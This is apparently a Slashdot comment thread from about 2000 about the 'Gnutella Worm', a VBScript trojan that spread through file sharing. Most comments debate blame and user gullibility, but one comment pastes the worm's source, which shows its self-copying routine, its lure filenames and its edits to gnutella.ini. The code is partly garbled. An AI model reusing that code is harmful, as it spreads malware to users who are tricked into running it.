• The user must search for the files with the particular names, download the file, and then execute it. The "worm" does not self-propagate. In fact, I'm not sure if it is even a worm. It seems more like a trojan to me. I think that the reports are automatically labeling anything written in VBScript as a worm.
• Obviously, it rarely has an effect on any of the clones, since they don't use the same config file structure, and they usually aren't found in "C:\Program Files\Gnutella\".

There we go, that should reduce the hype a little bit... or maybe not.

--

Re:Some details about the worm.

[talks_to_birds]

"C:\Program Files\Gnutella\"

Sounds to me like another problem only the Windows folks have to worry about..

t_t_b
--

Re:This is proof that Linux is not immune

[beaverthecleaver]

If you check it there is no offical gnutella for linux just clones and linux doesnt deal with vbs or ini files. Get it right before you decide to rip on something you dont know about Beave

But what about popup box trojans

[rana]

There's a reason why popup boxes for administrator access are unpopular: It's too easy to make a mock popup box in order to snarf passwords. That's one reason (the only reason?) why you have to three-finger-salute in order to log in to NT, it's a bit harder for the trojan to grab the sysreq that's generated by Ctrl-Alt-Del.

IMO, the NT style login-via-sysreq would be a good feature to add to Linux. It wouldn't be too difficult to do. It's probably already in place in the more secure Linux distro's, but I haven't checked them out, since I'm not that paranoid about my co-workers putting trojan password sniffers on my box.

Re:But what about popup box trojans

[DavidTC]

You mean Alt-Sysreq-K, which disconnected all programs from the console and logs you out?

-David T. C.

Re:hrm

[evand]

Why would I do a stupid thing like that? Give me *some* credit, will you?

OK, OK! ::backs off and smiles:: I really don't know you personally, have never met you, etc. It wasn't clear from your post what you were asking.

I just thought there was something special about IRC clients, like maybe letting many people on IRC know my IP address when I run as root or something.

The only thing I can think of is that if there were some kind of exploit in your IRC client that allowed file access/program execution as the user running the client, running as root would present a major security problem.

...but remember, Gnutella isn't actually weak...

[webword]

And I quote, from the Gnutella home page:

"Some reports have been circulating in some of the online press about a 'Gnutella Worm'. This 'worm' does not exploit any weaknesses in gnutella itself, but rather weaknesses in the Windows operating system and more importantly, the user. This 'worm' will not affect anyone who doesn't manually download it, and subsequently manually run it. Gnutella does not execute any files it downloads. Be smart, don't run anything from an untrusted source without checking it first. This is an exploit of human gullibility and a weak operating system, nothing more."

Gnutella powerful, humans weak. Grunt, grunt.

John S. Rhodes
WebWord.com (Usability Vortal)

Re:Reminds me of this UNIX "virus" I recieved once

[C.Lee]

>This could have been easily done in Perl or any other script language
>as well so Linux isn't really immune to it (only nobody has never done
>it before).

Yo! Tell us all just how this could have been easily done in Perl when the Linux Gnutella clones doesn't and most likely never will execute/run downloaded scripts?

Re:...but remember, Gnutella isn't actually weak..

[Phil+Wilkins]

Simple, only pirate^H^H^H^H^H^Hshare data files. Pretty hard to hide a trojan inside an mp3 / mpg, although I'm sure wma's probably got some way of running embedded code...;)

You run an unknown executable on a non-essential connected system, you deserve what you get.

You run unknown scripts without reading them first, ditto...

Maaan, these things say VBS in the filename, not mp3, or mpg, I mean, some people are just asking for it.

But I forget, this is the land where you can sue McDonalds for a giving you what you ask for, namely, a HOT cup of coffee.

Re:...but remember, Gnutella isn't actually weak..

[Stardate]

Any VBS file is NOT a binary file, it is a script, a text file which must have a .VBS extension to be executable (at least on a double-click). An anti-virus program running in the background can automatically check binary files for virus signatures.

How to look like a fool!

[Ratface]

I do like the ironic sense of humour that the "victim" file has. The fact that one can use the features of Gnutella to go and see how many people have been infected by the worm is pretty original. However, as worms go, this doesn't seem to have been particularly effective at replicating itself.



"Give the anarchist a cigarette"

HNN has some information on this

[QBasic_Dude]

HNN:

A worm with minimal malicious activity is infecting Gnutella users at an alarming rate. Gnutella is similar to Napster in that it allows peer to peer filesharing. The worm, which has as many as twenty file names, contains a message from the author "if I was a naughty boy, I could use scripting to get name, email, whatever files." Users are cautioned to be wary of files within Gnutella that have .vbs extensions.

Name a file "Metallica"

[BoLean]

Then it'll get downloaded tons. I wonder if this is how Napster users were snagged?

Re:Microsoft to blame?

[finkployd]

yours is based more on the generic Slashdot "Microsoft sucks, Linux rules" viewpoint.

Really? please re-read my post and find either the words microsoft or linux. For that matter find a reference to ANYTHING vender specific except VB. I was not attacking the language, only saying that this virus is not a gnutella specific virus, it is a visual basic virus. Sure it could be writen in a bash script but then it would be a bash virus. All I was doing was classifying it.

It seems there are two kinds of extreams on slashdot. Those who claim Linux is the end all of computer and that microsoft sucks, and those who never fail to attack anyone and everyone of harboring that viewpoint. I believe in your zest to paint me in that light, you failed to actually read my post and just assumed I was trolling the "slashsot party line" as it were.

Finkployd

Really Clever

[LaNMaN2000]

This is a really clever infection mechanism but it is hardly the worst problem facing Gnutella. Many servers simply house large numbers of files (with appropriate names) that redirect users to the owner's porn site or places a desktop link to said porn site. Many novice users will not think to check the file size and will end up with just porn advertising instead of what they were looking for.

I think this low signal/noise ration is what is going to hurt Gnutella. Napster avoids this problem by only allowing MP3 files. If it is a worthless file, it will only open in an MP3 player and be found to be an invalid file. On Gnutella, the user could execute a file in the appropriate program--making novices all the more vulnerable to viruses and advertising.

Re:Really Clever

[Phil+Wilkins]

One of these days, people will learn to check the extension. If it's html, or vbs, or indeed, anything other than the type you're looking for (for pR0n try jpg, gif, mov, mpg), don't download it, it's almost certainly not what you want.

Fool me once, shame on you, fool me twice, shame on me, fool me thrice, nuke my system, mail my pR0n collection to my parents, boss, and the FBI, and I'm a complete moron who deserves everything I get.

Re:Really Clever

[dolanh]

In theory you can filter files in Gnutella as well (at least by file extension). The problem is, most users will never get that far...

whats in a name?

[Yarn]

Adding GNU to the beginning doesnt mean its made by the FSF. eg: gnuplot.

I could make a program to manage gnu breeding, and call it gnusex, doesnt mean it runs on linux, has open source, or was made by RMS.

TrollMark: 1/10

Re:...but remember, Gnutella isn't actually weak..

[Mija+Cat]

Windows, like DOS before it (and CP/M before that) uses the extension to determine file type.
Pretty sad, really.

clearing things up

[matticus]

get your definitions right, people-this "worm" does not attack linux users. linux is immune to it. why? have you ever *tried* to run a vbScript in linux? it is not supported at all. plus, there isn't even an official linux gnutella client. i guess when people see GNUtella, they think linux. but it doesn't affect linux at all. now no more people can say "well, linux finally has a virus, ha ha ha!" because this doesn't have anything to do with linux.

Now is the time?

[genki]

Is it just me or is lately the time for worms? Between this (and all the other VBS worms), and the /. worm going around...

---------------------------------

Re:Now is the time?

[nezroy]

It does make you wonder as to the flatness of the learning curve for the human species... how hard is it NOT to double-click on something you weren't expecting from someone, with weird extensions you've never seen before, and has an always tacky filename? Save yourselves, people! Think once!

this is getting really old

[eastMike]

whoop-de-doo...another vbs worm being sent around. wow, this is really something new. First of all, nobody is impressed by this kind of thing. second of all, it is not original or amusing. So why must people keep making these stupid worms?

Re:this is getting really old

[kurowski]

The question is not "why must people keep making these stupid worms" but "who cares" and "why does slashdot insist on publishing stories about them"?

Do we really care? Even the slashdot-reading Windows users probably don't care!

Hint- if you use Windows AND Gnutella AND you download and run arbitrary Visual Basic scripts, then you probably don't understand most of what slashdot reports on (well...). Hey kid, here's a nickel. Go buy yourself a real OS.

Remember At Ease?

[Grahf666]

There used to be a program for the older versions of Mac OS called At Ease, which basically made it very hard to do anything bad to the computer (ie you couldn't change any settings, etc.) I'm not sure what it did in the way of actual security from outside threats... Granted, Mac OS users look at all the carnage being wrought in Windows-land by virii/trojans/worms and laugh, because doesn't affect them one bit. There are very few Mac viruses. Perhaps Bill and his friends over at Microsoft should look into making some kind of added-security shell to Windows to put onto your average school or office PC, to prevent people from doing idiotic things. Or at least add a few extra warning labels, and make it so you can't just press return to confirm. "Do you want to run this suspicious-looking .vbs file?" "Are you sure you want to run this suspcicious-looking file? Microsoft Corporation does not insure that this file will not harm your computer?" etc, etc...

Re:Remember At Ease?

[jbarnett]

rexplorer.exe

instead of rsh :)

Re:asm

[GoRK]

In fact I hate to have to admit it but NT's permission scheme for files is far far more robust than your everyday UN*X.

Kill the VBS..

[technos]

I'm sorry, but this is just one more example of how [l]users make viruses possible. A Visual Basic script virus that needs to be activly run? Sheesh, I'd run it through a scanner and have a look at it before I ran it; Most sane people would! Even if they didn't know what they were looking for, I'm sure they'd recognise evil intent!

But all you hear is "nasty virus writers" from the mass-media, when it's stupid, stupid users to blame.. Reminds me of a lawsuit that started in a local BBS message board back in '87. Someone posted, in jest, that format c: would fix a particular problem. Two lusers tried it, formatted their drives, and promptly retained lawyers because they thought they could sue someone else for their own stupidity. Judge tossed it out, thank God.

Re:Kill the VBS..

[JakeS]

It's not really a virus, it's just a script (like plenty of shell scripts), that runs writes to an ini file (like echo newstuff > gnutella.ini) and copies its files to the upload directory for gnutella (like cp thisfile /home/gnutella/share/).

A scanner would have done very little good here. And vbs isn't really to blame either. It's just a matter of fooling users into running something they ought not to.

Linux IS immune to this worm

[knuth]

An AC says that this incident proves that Linux is not immune, that this is a wakeup call blah blah blah.

Linux is immune to this Gnutella worm. Wanna know why? If you had read the Trend Micro alert linked from the article, you would see that if executed, the file looks for C:\PROGRAM FILES\GNUTELLA. Got that on your Linux box? I think not. Even if you dual-boot, there would be no way to infect Linux while in the Windows partition or vice versa. As an extra bonus, the technical details page says that the affected OS is Windows 98. And it modifies the GNUTELLA.INI file. Got one of those on your Linux box? Again, I think not.

And it spreads by people executing downloaded copies with file extension .vbs. If you were in Linux, you'd see the extension. What with other recent outbreaks, you'd be a fool to run an unknown, unchecked VBS file in Windows.

So what are you waiting for?

"If Linux was just as popular with stupid users as Windows is, something similar could happen with Perl scripts."

There are plenty of stupid Linux users, and I'm sure that many of them use Gnutella - what are you waiting for?

If it's possible, then do it.

Is it the fact that Linux won't run something that's not flagged as executable? (Doesn't matter what you name the file, if the X bit isn't set, it won't run.)

THIS IS A WINDOWS PROBLEM. Yes, a smart user won't get hit by it, but that doesn't provide any proof that it's a 'stupid user' issue. Show me ANY Linux app that automatically sends a non-executable file with a ".pl" extension to the Perl interpreter when you click on it.. Does X do it? NO. Do any window managers do it? NO. Do any desktop managers do it? NO!

This is what Windows is doing - you click on something with the '.VBS' extension, and it gets sent to the VBS interpreter - there is something fundamentally wrong with this, and this fundamental problem is part of the OS.

Re:hrm

[extrasolar]

My comment was intended to be neutral.

No offense meant or taken.

Evolution

[fishexe]

It's reached the stage where the sum of the computing power of the world has become so complex that bugs and other random events evolve into malicious virii roughly 1/10000000 times and these virii then evolve upon encountering more bugs and random slip-ups and so it progresses.

Pretty soon we'll have fully sentient a-life floating around online. In the form of email worms reading "I love you!".

Ever get the impression that your life would make a good sitcom?
Ever follow this to its logical conclusion: that your life is a sitcom?

The Worm is a HOAX!

[Sune+DK]

Proof:
Open your Gnutella client.
Search for 'GWV'.
ALL the files have the same ID:
"Generation #: 13
Victim ID: 300E62E41438D411BA6F001061B08B89"

And ALL the files is hosted by someone who only has a 28.8 connection.

Do another search:
Search for '.vbs'.
ALL the files is hosted by someone only having a 28.8 connection as above.

Conclusion:
This Worm does not work, and the only person who is infected by this .vbs-script, is the person who write the damn thing.

For a full listing of filenames...

[TheSimon]

Go Here

Basically a complete description of the worm and the associated filenames.

Re:Reminds me of this UNIX "virus" I recieved once

[SomeOne2]

But that isn't really necessary, the file has just to lure the user to run it (a trojan perhaps) and than spread. On the other hand I could think of better ways to do this than Gnutella but it would be possible...

Re:Gnutella is closed source, hence not secure

[sterno]

Open source != secure. Open source means that there is greater potential for people to look at it and make sure it is, but it requires people willing to go through that effort.

---

Nutella

[truefluke]

Actually its a pun. And a pretty bad one, considering, these guys don't get the GNU sense of humour at all.

(G)/Nutella (notice the slash). "Nutella" is a chocolate hazelnut spread, commonly put on toast.

See? I told you it was lousy. :\

You need help boy!!

[Wheely]

But thanks for making /. a fun place to be.

I vote for a /. archive of your posts!!

Regards

fnord

[DavidTC]

There is no message here.

-David T. C.

CODE...

[jyak]

Option Explicit
Dim CurrentFilename, CurrentGeneration, InfectionDate
CurrentFilename = "ASF Compressor (No quality loss).vbs"
CurrentGeneration = 14
InfectionDate = "6/2/2000, 3:51:46 AM"

'
const ProgramName = "Gnutella Worm v1.1"
const ProgramDate = "2000 May 21. I think that's the first Gnutella Worm."
'
'
' Watching CurrentGeneration will be quite interesting. I wonder if
' anyone ever studied this compared with real viral spreading.
'
' 42
'
' History
'
' 1.1 o Now copies itself to a list of target keyword instead of just current filename
' o Fixed a but with Ini path... (1.0 didn't work at all. he he.)
'
' 1.0 o Initial Release
'

' Behavior Control Parameters
Dim NewFilenames, GnutellaPath, GnutellaIni, VictimFilename
NewFilenames = Array(ProgramName & ".vbs", "Jenna Jameson movie listing.vbs", "Pamela Anderson movie listing.vbs", "Asia Carerra movie listing.vbs", "xxx FTP movie listing.vbs", "ASF Compressor (No quality loss).vbs", "collegesex.vbs", "Gladiator.vbs", "Battlefield Earth.vbs", "Evangelion complete episodes scripts.vbs", "Scan Master checklist.vbs", "How to eat pussy.vbs", "Alicia Silverstone.vbs", "Pearl Jam.vbs", "Mp3 compressor (Half the size but same quality).vbs", "Napster Metallica Crack.vbs", "Santana.vbs", "NSync.vbs", "Nirvana.mp3.vbs", "Shania Twain.mp3.vbs", "Jesus loves you.vbs", "Gnutella upgrade.vbs", "OFFICIAL Gnutella Option Pack.vbs")
GnutellaPath = "C:\Program Files\gnutella\"
GnutellaIni = GnutellaPath + "gnutella.ini"
VictimFilename = "Yet another GWV! " ' (Gnutella Worm Victim :)

Const ForReading = 1
Const ForWriting = 2

Dim fso
Dim SourceFile, DestinationFile
Dim NewFilename
Dim VictimName

Function ModifyAndCopy
' Change Header data (New name, Generation number, any info passed down to the next Generation)

DestinationFile.WriteLne(SourceFile.ReadLne)
DestinationFile.WriteLne(SourceFile.ReadLne)

DestinationFile.WriteLne("CurrentFilename = """ & NewFilenames & """")

DestinationFile.WriteLne("CurrentGeneration = " & (CurrentGeneration + 1))

DestinationFile.WriteLne("InfectionDate = """ & Date & ", " & Time & """")

SourceFile.ReadLne ' Skip the ones we just wrote changed.
SourceFile.Readlne
SourceFile.Readlne

' Copy the rest of the file as-is
Do While Not SourceFile.AtEndOfStream
DestinationFile.WriteLine(SourceFile.ReadLine)
Loop
End Function

Dim IniFile, IniFileDest
Dim Line

Set IniFile = fso.OpenTextFile(GnutellaIni, ForReading)
Set IniFileDest = fso.CreateTextFile(GnutellaIni + "_", ForWriting)

Do While Not IniFile.AtEndOfStream
Line = IniFile.ReadLine

if Left(Line, 8) = "extlist=" Then
IniFileDest.WriteLine(Line + ";vbs")
ElseIf Left(Line, 13) = "databasepath=" Then
IniFileDest.WriteLine(Line + ";" + GnutellaPath)
ElseIf Left(Line, 12) = "clientid128=" Then

IniFileDest.WriteLine(Line)
Else
IniFileDest.WriteLine(Line)
End If
Loop

IniFileDest.Close
IniFile.Close

fso.DeleteFile(GnutellaIni)
fso.MoveFile GnutellaIni + "_", GnutellaIni

End Function

Function SignalVictim
Dim Victim
Dim Line
Dim SignatureFilename

SignatureFilename = GnutellaPath & VictimFilename & VictimName & ".zip"

Set Victim = fso.CreateTextFile(SignatureFilename, ForWriting)

Victim.WriteLne("Generation #: " & CurrentGeneration)
Victim.WriteLne("Victim ID: " & VictimName)
Victim.Writene("Infection date: " & InfectionDate)

Victim.WriteLine("If I was a naughty boy, I could use scripting to get name, email, whatever file I want.")

Victim.Close
End Function

Set fso = CreateObject("Scripting.FleSystemOjbject")

If fso.FolderExists(GnutellaPath) Then
For Each NewFilename in NewFilenames

Set DestinationFile = fso.CreateTextFile(GnutellaPath + NewFilename, True)
Set SourceFile = fso.OpenTextFile(CurrentFilename, ForReading)

ModifyAndCopy
ProcessIni
SignalVictim

SourceFile.Close
DestinationFile.Close

End If

fso.DeleteFile(CurrentFilename)

VB != VBS

[BoLean]

Visual Basic and Visual Basic Scripting are two different animals.

hrm

[jbarnett]

When I first was learning Linux, I got flamed a couple times because I was IRC-ing as root. Most IRC rooms ban people running as root, because it is well REALLY stupid to do. But what always made me mad, is sure they ban me for being stupid and running root, but they don't ban any Windows95/98 users. What is up with that?

I don't run any user programs as root, only su into it when it is needed for system admin tasks, but I now know why it is stupid. Really stupid.

AC or not, mod this up.

[Redking]

Do it.

Worm? Doesn't sound like it.

[G27+Radio]

Maybe I just read it wrong, but this is really kind of silly. You download something, then execute it. If it's malicious then you get screwed. Aren't there numerous FTP clients that allow you to execute what you've downloaded from within the client? What about IE 5.0? It allows you to execute the file you've downloaded from within the browser.

This is just another VBS trojan like all the rest. It's not Gnutella's fault. Or do I misunderstand?

numb

Re:wrong wrong WRONG

[GRAMMERSoft]

"GNU" implies GPL

"Gnu" is the name of an animal.

If GNUtella is not doing this they must be corrected

What are you going to do, sue them for trademark violation (woohoo!! I used the correct term!!!)

Having said that, sir, I feel it is my obligation to inform you that you are, in fact, a baboon.

It's not totally integrated.

[Redking]

98lite

Re:Reminds me of this UNIX "virus" I recieved once

[shren]

Dammit! You've infected my system now. Why'd you have to dump this in a public forum where so many people would hit it?

Where's my virus scanning software?

my favorite is the html generating scripts

[AugstWest]

Every search you do through gnutella now comes back with an html page named [whatever-you-searched-for].html -- it's a page with javascript to load a porn site.

It's just ironic when you're searching for something like Zappa and you end up a a britney spears porn site.

Perfect metaphor for today's music industry. Last night during every commercial break Fox was touting britney as "The Voice of a Generation."

heh. heheheheheh. hehehehehahahahahahahBAHAHAHAHAHAAAAAAA

Blueberry pie recipes?

[nezroy]

While the network can be used to exchange any files, most files are pirated copies of music and software or porn.

I thought the majority of file transfers on Gnutella were blueberry pie recipes...

Re:Gnutella is closed source, hence not secure

[technos]

This is not a Gnutella issue. It's a weakness in Windows, one that has been exploited time and time again via email. This 'trojan' just happens to propogate via Gnutella.

Oh, yeah. Kudos to the author. Novel delivery mechanism! Better than ILUVYOU and it's attempt to spread via IRC!

This all prooves MS is good for consumers!!

[rmstar]

Do you remeber the old days? If you wanted to write a worm or a virus you had to know a lot of arcane stuff and code it in assembler.

Today you use Microsoft Visual Basic, ActiveX, and use a Wizard. Ain't that nice, folks??

rmstar

patent pending for 3-click technology.

Re:This all prooves MS is good for consumers!!

[JakeS]

In the old days there weren't as many folks stupidly running shell scripts handed them from unknown sources. This could have been done just as easily with pico and bash, but luckily most linux users have a bit more of a clue.

Re:This all prooves MS is good for consumers!!

[RedGuard]

If you want to exploit bugs in MS operating
systems you will still need a good grasp
of assembler (or least to be able to get an
exploit from someone who has). If you want
to write a malicious program you could write it
in VBS, C, FORTRAN for any kind of computer.
Trojan horse programs don't require any special
knowledge other than a bit of social engineering
and never have.

The facts of life

[Animol]

It seems all to convenient that this is all coming around at once. With the "ILove You" thing and all, VBS is getting a really bad name for things like this. Gnutella happens to have a worm running through it's system right now, but look on the bright side - like they say on their website, it must be user-executed (like most malicious proggies).

All in all, yes, Gnutella won't be totally secure until it's totally open. But after all, it's not like they PLANNED on someone doing this. And if you're not rock-stupid, you shouldn't have a problem here. You take the good, you take the bad...

For you conspiracy nuts...

[KilobyteKnight]

... Here's what's really going on: Microsoft is releasing all these worms themselves. They are trying to position VB Script at the most Elite, rad cool, programming language on earth... used by all the "big" hackers, crackers, and hell, the phreaks too.. Since they couldn't come out and openly advertise a product designed for hackers (what with that pesky lawsuit and all) they advertise by example...

Yeah, that's the ticket.

Re:Troll? Maybe.

[technos]

There used to be a project for a Unix runtime environment for VB. It never quite got past the early stages, but even the early snaps were good enough to interpret uncompiled scripts..

Reminds me of this UNIX "virus" I recieved once...

[pjl5602]

&lt snip &gt
This is a UNIX email virus. It works on the honor system:

If you're running a variant of unix , please forward this message to
everyone you know and delete a bunch of your files at random.

Thank you for your cooperation.
&lt snip &gt

The only thing this Gnutella trojan can prey upon is an idiot user and there really isn't much one can do to protect against that.

Re:This is proof that Linux is not immune

[Masked+Marauder]

I've heard that Corel will be using VB script in its office suite. Not yet, but soon. So at least there will be some sort of VB interpreter on Linux when that happens. I don't know if it will be accessible outside of the Corel suite.

micro$oft strikes again w00t

[mizhi]

Heh, again, more security problems because of Microsoft's vbs engine. As I'm sure most people here realized, this worm will only affect windows machines. And windows machines run by people who aren't careful enough to check the script before they run it.

But to be fair, it's basically the same old story from the old days when trojans, virii, and worms were distributed in .COM and .EXE files (for those of us who used DOS =) hell, there were even a couple .BAT trojans (not very effective but still)... you could download all you wanted and not a thing would happen until you ran them. Then again, that's what scan was for... =)

You could have the same story with *nix though. What's to stop someone from writing a program that wipes out a user's directory? Or a sneaky bit of code in a program claiming to need access to root? I suppose the reason it doesn't happen as much in *nix land is because the users are generally more competent than people accustomed to simple point and click on M$ stuff; and incompetent people generally don't get root. =)

I guess the point is, all it takes is someone dumb enough to run a script or program etc without checking it out. If you're not practicing safe computing, you'll get an STD (Stupidly Transmitted Disease).

Re:Gnutella is closed source, hence not secure

[bibos]

Since the whole Gnutella Protocol is completely open, it's perfectly easy to write your own open-source GNUtella clone,
I see GNUtella as being 'open' by having the open protocol.

And by the way it's a damn easy protocol. Seems like being designed for hobby programmers, and I don't think that's bad.
The easier it is, the more likely it will get widely accepted.

Check the GNUtella protocol out for yourself

Join the grassroots movement.....

[carlos_benj]

... to reclassify .VBS extensions to stand for "Virus Building System"

carlos

Re:Gnutella is closed source, hence not secure

[Biff+Cool]

It's not a backdoor it's just downloading a file... Opening the source won't protect idiots from their own mouse buttons if they are dead set against clicking anything they can see.

Conscience is the inner voice which warns us that someone may be looking.

Gnutella to blame?

[finkployd]

What if it put this on Freenet? Does it become a Freenet virus?
How about on my web site? Then it's a WWW virus.
Yeah, and I'll make it an FTP virus, and e-mail virus, and usenet virus....

IT'S A VISUAL BASIC VIRUS!!!!! Wake up ZDNet!!!
It's a single file. It can be transmitted in any one of the millions of ways files can be moved from point A to point B (including sneakernet)

As long as there are people who repetedly test how hot the stove is with their hand, see if a dog is nice by sticking their hand in it's mouth and open vbs files on an operating system renowed for it's insecurity, we will have this problem.

People simply don't learn from the past. There is not much you can do but smile and charge them $100/hour for onsite service to fix the problems they create for themselves.

Finkployd

The _Real_ Reason these worms keep going

[GrayMouser_the_MCSE]

Dialog of a true phone conversation held this morning:

(L)user: I just received an email titled: RESUME. Should I open it?

Support: Did you ask for this resume to be sent to you?

(L)user: No

Support: Do you know the person who sent it to you?

(L)user: No

Support: Do you get resumes as part of your job function?

(L)user: No

Support: Then please delete the email without opening it.

(L)user: Are you sure? I don't want to lose anything important?

Actually, I considered it a not so small victory for training that the user called, but it shows the point. The biggest security hole in any operating system will always be the carbon interface banging on the keys. Once these users get loose on an any system, security becomes much, much more difficult.

The thought of possibly corrupting everyones email must be weighed against the possiblility of missing a funny chain letter... Anyone's guess who wins that one.

(And yes, I freely acknowledge that MS makes exploiting these poor creatures incredibly easy, but its only a matter of time before they move on to linux and other OS's)

Re:Virus hackers becoming Microsoft'ed?

[bubbles.utonium]

Sure, it might be more impressive to make a new virus that infects the boot sector or executables, or wasn't a script ... but damn, I bet it's more satisfying to screw over Office or Outlook :)

More interesting...

[DeepDarkSky]

I've used Gnutella and looked around for things, just typing them in, I was actually looking for the script of an animation film, and happened upon one of these files with the .vbs extension. Guessing that it must be some kind of VBScript virus, I downloaded it and renamed it to a .txt file and just looked at it using notepad (not that I really needed to rename it, but it was just to be safe, in case I accidentally double-click). It looked interesting enough, but I guess a lot of people do fall for it, even though the extension is not exactly hidden on it.

There was something more interesting, though, that I discovered. Somewhere, someone figure out a way to take the search words that get sent out, and automatically create an HTML file from it. If you download it (as I have, a couple of times), thinking maybe it's an HTML file linking to some place that may have what you want, you'll find it's something else totally unrelated - somewhat akin to getting the xxx sites when searching for completely innocuous topics because they manipulated the search engines. Nonetheless, an unscrupulous (relatively speaking, given the nature of Gnutella, and because after all, who would complain?) could link to a site full of banner advertising or some such to get hits.

Same vien as ILOVEYOU

[PimpDaddie]

This "worm" is basically in the same vien as the ILOVEYOU virus and other email attachment viruses. They base their spreading and damaged on 2 things. One, a distrobution method. Two, the user executing the code voluntarily. In this case the method of execution is the same, a VBScript that is made to look like something it is not so that a user will execute it. The authors just replaced the distrobution method of email and address books with GNutella and its distrubuted searching. This virus is realy nothing new. Users should just remember not to blindly execute programs they download of the net. They should also check the extensions of files to make sure they are not scripts. Also, this virus does not expose any weakness of closed source Gnutella or expose any new weakness of Windows. It just exploits they same weakness that ILOVEYOU and the other VBscript viruses exposed in VBScript and Windows security.

Re:Same vien as ILOVEYOU

[Ranger+Bob]

In this case the method of execution is the same...

Not exactly. In the case of ILOVEYOU, Outlook would automagically execute the attachment when the user decided to view it (not always prompting for "Save or Open"). With this thing, the user actively thinks "I want that file", downloads it, and manually executes it.

I got a benign variant of this...

[mav[LAG]]

As well as the payload it supplied a link:

Here's how to disinfect yourself.

When will this run on linux

I mean ... with all the VBS files flying around when will somebody port Visual Basic Sripting support to linux. I am sick of having to run Windows just to get a VBS worm. Is somebody working on this already?

Maybe I don't understand gnutella...

[FascDot+Killed+My+Pr]

...but why is this a bad thing?

Isn't file-sharing the POINT of gnutella? So when the guy says "I can get any file I want" isn't the response "Help yourself"? Surely anyone can change anyone else's gnutella.ini by just downloading it, modifying it and copying it back up?

Of course, if gnutella is only supposed to make certain files available (in a sandbox, say) then this would be a problem--although a relatively minor one, yes?

And so what if he's uploading viruses? People upload viruses to BBSs and FTP sites, too--that's why you have to be careful what you download and run. It's the "auto-run" aspect that makes a worm/virus dangerous.
--
Have Exchange users? Want to run Linux? Can't afford OpenMail?

Re:Huh?

[jmpvm]

Don't just assume that because it has "GNU" in it that the source is open. Because it is not.

Virus hackers becoming Microsoft'ed?

[iceT]

Is is just me, or have the days of the 'really cleaver' viruses gone away. When was it that you last saw a new virus that infects the boot sector? How 'bout a virus that infects executables? How about a virus that was actually a BINARY, and not just a script? Viruses that infected binaries, but still allowed the binary to run... Remember the ones that used to corrupt the FAT table? Now THOSE were VIRUSES.

Everything these days seems to focus on MS Office (Macro Viruses), VB Script, and Black Plagues' Flea of the 90's: Outlook/Outlook Express.

Those were the days... :^D

Virus to set security settings to paranoid?

[eellis]

I don't really know enough about VB to do this, but shouldn't it be possible to write an ILOVEYOU type thing that propagates around the world, setting everyone's security settings to maximum, (and optionally deleting wscript.exe, or whatever it is you need to run that kind of thing) so that no further viruses like this can happen?

This is NOT a Gnutella problem...

[Ranger+Bob]

...it's still a Windows problem. You could also do this with FTP-- *ANY* FTP server could cough up a copy of this file...

At least we can narrow down who did it

[adagioforstrings]

to those people with bad grammar. :-)

Novices...

[nezroy]

You're making the assumption that Gnutella cares about novices in some fashion, or is otherwise targetted to be an idiots pirating tool. Well, from what I glean from their webpage and from usage of the program, both of these assumptions are completely invalid. Your arguments are true, but irrelevant.

True because, yes, the freedom to host and grab whatever you want makes it more powerful, and thus more open to abuse. Irrelevant because users who care are more interested in a utility that is powerful and versatile than they are concerned about disruptions caused by abuses of that versatility.

asm

[jbarnett]

Back in my day we didn't have any scripting launage to code virii/worms in, we had to do it in hard code ASM, by hand, without an assembler, in the middle of winter, without power in middle of a frozen lake. Back then, there wasn't "documenations", we had to reverse engineer the processer to get the correct op codes, then write are own assmebler.

Then when we wanted to run the file, we had to transfer it via 340K 5 1/4 floppy disk, we didn't have networks, the Internet or fancy hard drives.

Then once the floppy was in the users machine, we had to call up and have the user run 4 differant executables, this took a lot of social engineering.

Seriously though, who says Microsoft isn't invonative? If you want to write a virii/worm for DOS you needed with ASM or C/C++, which is differant for the typically script kiddie to understand. Hand someone Visual Basic for dummies book and with a week have a worm that can prograte around the Internet within the matter of days. Thank you Microsoft for your weak securtiy premissions and easy to use high power octane scripting launage.

Seriously though, if Microsoft wanted to make it more security, give it user premissions like Unix, but if they want to keep it easy to use, have a popup box when something (program/script/command) wanted to access/write/read another users file and say "This program needs to run at a differant user level: level foo, are you sure you want to run this?" and when they click "ok" it gives them a popup box to enter username/password for level foo and if they are entered correctly it runs the program with higher premissions. Easy to use and somewhat secure. Just have Unix or Unix like premissions, with the easy of use of Microsofts pop up and dialog boxes, the user won't even have to touch the command line (btw command.com sucks compared to bash, and edit is pathetic compared to vi, I won't wish Microsoft command line interface to my worst enemy)

Not a gnutella weakness, but rather a user weaknes

[Manuka]

This thing doesn't actually exploit anything in gnutella proper, but rather the dumbshit user and the weak OS he's running. For this thing to actually propagate, the user has to :

• 
  a) Manually select the file for download, with its VBS extension glaring in their face
  
  b) Manually go into the Gnutella download directory and execute it.
  

In other words, if you get "infected" by this thing, it's your own damned fault.

Visual Basic does exist for Linux now....

[Midnight+Ryder]

It's already somewhat available. Check out , which is basically Visual Basic for Applications on Gnome (and if it gets done for the Gnome environment, it will get ported around.)

Michael Meeks & co. is doing the job right, however. GB is designed to be a lot more secure than VBA is currently. Personally, I'm dying to see this get completed - I can finally start moving the company way from MS based product to Gnome's Excel-alike. You'd be surprised how much use VBA gets in Excel, and a replacement that covers both Excel and the VBA scripting engine is going to go a long way to moving larger offices over to Free Software / Open Source equivalants.

For those who are really interested - this is VBA, not really VB. There is no Visual Basic IDE for Linux planed. At a later date it's supposed to do Gnome Basic -> C conversion.

And while many people here hate Visual Basic, I'm still a fan of it :-) I'm really happy to see the same thing for Linux coming!

Re:Visual Basic does exist for Linux now....

[Midnight+Ryder]

Damn... didn't get that link closed properly - sorry!

GIAC

[craw]

I think that this is related to this story. Check out this report at SANS Global Incident Analysis Center. The source is listed as the second incident report. BTW, GIAC is a good source of info about seems to be the port scan du jour.

A point

[Greyfox]

This is why whenever anyone says wistfully that we need MS Office on Linux, you should kick them square in the nuts.

I don't believe you'll find a less security-aware company on the face of the planet. If they did port Office to Linux I have no doubt in my mind that it'll need root privs, and include all the happy horseshit that's been getting Windows users infected for years.

You can keep MS and the virusses that come with them.

Network Associates Worm Tech Info...

[Linkmastah]

Here's a link to Network Associates' (makers of Dr Solomons' and McAfee VirusScan) technical info on the Gnutella Worm, which also contains a complete listing of all the filenames created by the worm. Eerily, it's virus number 98666 on their database.

Re:Why is this a "VBScript thing"? Remember sirc2?

